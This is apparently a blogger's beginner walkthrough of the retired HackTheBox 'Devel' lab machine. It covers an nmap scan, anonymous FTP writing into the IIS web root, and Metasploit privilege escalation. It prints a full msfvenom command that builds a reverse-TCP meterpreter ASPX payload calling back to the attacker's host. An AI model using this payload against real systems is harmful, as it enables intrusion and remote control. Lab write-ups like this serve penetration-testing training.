Devel is a relatively quick and simple box which demonstrates security risks that may be associated with default program configurations. I would recommend this machine for any beginner wanting to learn more about penetration testing as it introduces the fundamentals of port scanning, and utilizing metasploit to get both the user.txt and root.txt flags.
user.txt and root.txt
To get started on this machine we're going to be performing a fairly straightforward port scan with nmap:
nmap -sC -sV 10.10.10.5
-sC: equivalent to --script=default -sV: Probe open ports to determine service/version info
The first thing we clearly notice is that port 21 is hosting a ftp server which allows anonymous login. This means our credentials to login would be:
However, before logging in, let's see if this ftp server is being used as a file directory for the web server. This can be checked by browsing to any of the following links:
http://10.10.10.5/iisstart.htm http://10.10.10.5/aspnet_client/ http://10.10.10.5/welcome.png
This confirms my suspicions that the ftp server is the file directory for the web server. So let's create a meterpreter shell with a .aspx extension. There are a few cheat sheets online which I like to quickly reference to grab a full command. Once a command/payload is picked it's time to run msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.43 LPORT=31337 -f aspx > notapayload.aspx
Before we upload this to the server we're going to set up a listener in metasploit:
So now let's login to the ftp server and see if we can upload our file:
Success! Now let's browse to the file we uploaded and we should see our meterpreter shell pop:
Awesome. Let's check who we are real fast:
Okay that's some good information. However, when browsing to try and obtain the user.txt flag I experienced this:
That sucks. But we do have a meterpreter shell.. Let's see if we can just getsystem:
Well it was worth a shot. Let's perform some more enumeration to try and find a foothold. For this I'm just going to pop back into a local shell and run systeminfo:
So this gives us a lot of information. However, the most important part of this that we're dealing with an X86-based PC and there have been not Hotfic(s) to the system. Maybe an exploit exists and we can take advantage of their lack of security. Let's background our meterpreter session and try running local_exploit_suggester:
We've got a load of exploits to try on this system. Let's start testing them:
One down (and my session died). However, once I've popped a new session and configured my options:
Let's check who we are:
Now that's the good stuff. We should be able to go and grab both flags now:
And just like that - we've completed the machine.
I'm slowly working my way through the retired machines since I was inactive on HackTheBox for awhile. However, I thought that this machine was pretty straightforward. Devel perfectly serves its purpose of being a beginners box. This machine required some basic enumeration skills, as well as some basic metasploit knowledge.
Thanks for reading!